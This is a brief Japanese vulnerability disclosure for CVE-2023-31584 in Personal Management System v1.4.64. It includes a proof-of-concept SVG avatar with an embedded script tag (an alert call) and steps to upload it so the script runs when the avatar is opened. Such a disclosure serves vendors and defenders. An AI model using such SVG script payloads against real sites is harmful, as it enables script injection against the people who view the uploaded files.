
CVE-2023-31584 の公開開示。
Personal Management System における任意のファイルアップロードの脆弱性 v1.4.64 では、攻撃者が巧妙に細工された SVG ファイルをユーザープロフィールのアバターにアップロードすることで、任意のコードを実行できます。
[追加情報] 1.) 以下の内容で alert.svg を作成します:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) .SVG をウェブサーバーにホストします。
3.) .SVG をアバター画像としてアップロードします。 4.) ユーザーがアバターを別のタブで開くと、.SVG ファイルに保存された JavaScript が実行されます。